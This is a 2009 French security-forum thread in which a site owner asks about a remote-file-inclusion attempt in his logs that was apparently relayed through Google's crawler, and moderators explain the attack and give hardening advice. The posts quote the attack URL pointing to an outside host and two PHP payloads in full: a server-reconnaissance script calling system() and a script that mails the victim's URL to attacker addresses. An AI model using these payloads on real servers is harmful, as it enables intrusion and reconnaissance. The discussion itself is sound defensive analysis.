IPB

Bienvenue invité ( Connexion | Inscription )




 
Reply to this topicStart new topic
Google Me Hack?, Truc bizarre dans mes logs...
krapno
posté Jun 18 2009, 03:14 PM
Message #1


Nouveau membre


Groupe : ZATAZien
Messages : 9
Inscrit : 22-April 09
Membre no 8,432



Bonjour,

Sauriez-vous expliquer ce log?

/index.php?page=http://nda.150m.com/id.txt
USERAGENT = [mediapartners-google]
IP = [66.249.72.237]
MASK = [crawl-66-249-72-237.googlebot.com]
REFERER = []

Contenu du fichier txt:
Code
<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
  
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                          
}

echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


Bien cordialement,
Go to the top of the page
 
+Quote Post
CybStup
posté Jun 18 2009, 03:56 PM
Message #2


Accro à ZATAZ
****

Groupe : Modérateur ZATAZ
Messages : 431
Inscrit : 12-January 08
Lieu : Darknet
Membre no 4,034



Bonjour,

Je vous l'ai expliqué dans le dernier message privé que nous avons échangé.
Il s'agit d'une tentative d'exploitation sur une vulnérabilité de type 'inclusion', ici RFI.
L'objectif étant de faire exécuter le code contenu dans votre fichier.


--------------------
Come crawling faster,
Obey your Master,
Your fife burns faster,
Obey your Master, Master
Master of puppets I'm pulling your strings,
Twisting your mind and smashing your dreams,
Blinding by me you can's see a thing,
Just call my name cause i'll hear you scream
Master, Master..

До скорой встречи - Пока!
Go to the top of the page
 
+Quote Post
krapno
posté Jun 18 2009, 04:02 PM
Message #3


Nouveau membre


Groupe : ZATAZien
Messages : 9
Inscrit : 22-April 09
Membre no 8,432



Bonjour,

Oui oui, je l'ai bien compris ne vous en faites pas.

Ma question ici porte plutôt sur fait que la source soit Google...
Comme si le bot de Google essayait de faire cette inclusion.

Bien cordialement,
Go to the top of the page
 
+Quote Post
CybStup
posté Jun 18 2009, 04:34 PM
Message #4


Accro à ZATAZ
****

Groupe : Modérateur ZATAZ
Messages : 431
Inscrit : 12-January 08
Lieu : Darknet
Membre no 4,034



Effectivement, j'ai bien constaté qu'il s'agissait d'une requête ayant été effectuée par Google.
Je vois plusieurs explications possibles. L'hypothèse la plus plausible consiste à manipuler des services de Google pour s'en servir comme relais à leurs attaques.
Comme ça semble compliqué alors qu'il n'en est rien, voici une démonstration.

Le site monip.org vous indique votre adresse IP.
IP : x.x.x.x ; votre.isp
Pas de proxy détecté - No Proxy detected
Mais en utilisant le service Google Translate
IP : 74.125.16.68 ; 1.0 translate.google.com TWSFE/0.9
Proxy détecté / Proxy detected

Un exemple parmi tant d'autres.

edit: Dans votre cas, on peux imaginer un empoisonnement du cache, démonstration

Ce message a été modifié par CybStup - Jun 18 2009, 04:38 PM.


--------------------
Come crawling faster,
Obey your Master,
Your fife burns faster,
Obey your Master, Master
Master of puppets I'm pulling your strings,
Twisting your mind and smashing your dreams,
Blinding by me you can's see a thing,
Just call my name cause i'll hear you scream
Master, Master..

До скорой встречи - Пока!
Go to the top of the page
 
+Quote Post
krapno
posté Jun 18 2009, 07:02 PM
Message #5


Nouveau membre


Groupe : ZATAZien
Messages : 9
Inscrit : 22-April 09
Membre no 8,432



Bonjour,

Anéfé relativement simple...
Mais que fait la police?? smile.gif

Dans ce cas, Google peut-il y faire quelque chose?
Devons-nous directement les contacter?
J'imagine que ce n'est pas nouveau comme méthode.

Je me vois contraint de bannir l'ip de ce robot/service en attendant.

Bien cordialement,
Go to the top of the page
 
+Quote Post
thibaut.l
posté Jun 19 2009, 02:52 AM
Message #6


Rompu à ZATAZ
***

Groupe : ZATAZien
Messages : 62
Inscrit : 9-December 08
Membre no 7,213



C'est donc une attaque automatisée, qui utilise un scanneur de faille d'inclusion écrit en php.Vous avez été victime d'un bot comme il en existe des milliers. Votre site a du être trouvé dans le tas de la recherche google. Les étapes qui suivront seront la sécurisation des dossier accessible via votre moteur de recherche.

fichier robots.txt
User-Agent: mediapartners-google
Disallow: /dossierfaillible

CybStup a sans doute du vous le dire.


--------------------
"No more free bugs" you say. I say that you are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: "knowledge must be free".
Go to the top of the page
 
+Quote Post
krapno
posté Jun 19 2009, 09:00 AM
Message #7


Nouveau membre


Groupe : ZATAZien
Messages : 9
Inscrit : 22-April 09
Membre no 8,432



Bonjour,

Mon fichier "robots.txt" est déjà renseigné pour les dossier interdits au référencement.

Mais ceci m'amène à la question suivante:
Si Google et les autres moteurs de recherche se fient à ce fichier pour ne pas indexer certains dossiers, c'est bien qu'ils peuvent le lire?
Donc un bot malveillant lui aussi peut lire se fichier et au contraire ne pas se gêner pour aller fouiner dans les dossiers qui y sont mentionnés non?

Bonne journée et cordialement,

PS: On trouve des emails dans certains fichiers:

http://www.grandao2000.xpg.com.br/tester.txt
Code
<?php

ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "now-env";
$email1 = "[email protected],[email protected]";
$headers  = "From: <$email>\r\n";


if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "foi";
exit();
}
else{
echo "numfoi";
exit();
}
?>

On peut leur envoyer des insultes? laugh.gif

Ce message a été modifié par krapno - Jun 19 2009, 09:44 AM.
Go to the top of the page
 
+Quote Post
CybStup
posté Jun 19 2009, 03:59 PM
Message #8


Accro à ZATAZ
****

Groupe : Modérateur ZATAZ
Messages : 431
Inscrit : 12-January 08
Lieu : Darknet
Membre no 4,034



Bonjour,

Non, Google ne fera rien, ce n'est pas utile de les encombrer avec des choses si peu importantes. Les insulter n'avancerait à rien, des lignes dans vos journaux, vous en aurez des milliers comme celle là. Bannir une adresse n'est pas la meilleure solution mais une alternative et bien garder en tête que dans des situations plus complexes, il peut y avoir des risques de représailles. Je rabâche souvent qu'Internet est un milieu hostile, c'est le cas. Il ne se passe pas une second de calme d'où l'importance d'apprendre à sécuriser ses installations. Il faut bien comprendre que le fichier d'exclusion des robots n'est pas une mesure de sécurité c'est tout au plus qu'une simple indication. Si vous utilisez Apache, commencez par définir les bons droits d'accès aux fichiers puis placer des restrictions en utilisant par exemple un fichier de configuration .htaccess . Si nécessaire et que vous savez exactement ce que vous faites, complétez avec des modules de sécurité. Dans votre message, la technique est similaire à la différence que si le code est exécuté celui-ci va en notifier l'attaquant en utilisant la fonction mail. Novice en administration ? Il existe des ouvrages spécialisés et pourquoi pas des formations, discutez en avec votre employeur quand vous lui apprendrez que votre site est régulièrement "assailli"


--------------------
Come crawling faster,
Obey your Master,
Your fife burns faster,
Obey your Master, Master
Master of puppets I'm pulling your strings,
Twisting your mind and smashing your dreams,
Blinding by me you can's see a thing,
Just call my name cause i'll hear you scream
Master, Master..

До скорой встречи - Пока!
Go to the top of the page
 
+Quote Post
krapno
posté Jun 22 2009, 08:18 AM
Message #9


Nouveau membre


Groupe : ZATAZien
Messages : 9
Inscrit : 22-April 09
Membre no 8,432



Bonjour,

Je vous remercie de votre éclaircissement et
vous souhaite une agréable semaine.

Cordialement,
Go to the top of the page
 
+Quote Post
wow
posté Apr 21 2010, 08:39 AM
Message #10


Accro à ZATAZ
****

Groupe : ZATAZ Admin
Messages : 217
Inscrit : 7-May 05
Lieu : Luxembourg
Membre no 2



Bonjour à vous,

La réponse est ici.

http://eromang.zataz.com/2010/04/20/google...ng-web-attacks/

Cordialement


--------------------
Eric Romang / Co-fondateur de ZATAZ
www.zataz.com / www.zataz.net
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

 



RSS Version bas débit Nous sommes le : 25th May 2013 - 06:12 PM